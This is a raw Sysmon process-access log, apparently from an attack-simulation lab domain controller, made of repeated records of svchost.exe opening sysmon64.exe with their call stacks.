13:53:21.722{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001722Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.722{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001721Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.722{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001720Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.722{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001719Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.722{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001718Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.722{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001717Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.722{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001716Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.721{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001715Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.721{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001714Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.720{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001713Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.720{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001712Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.720{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001711Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.720{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001710Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.720{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001709Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.720{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001708Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.720{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001707Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.720{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001706Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.720{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001705Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.712{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001704Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.712{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001703Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.712{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001702Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.712{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001701Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.712{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001700Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.712{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001699Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 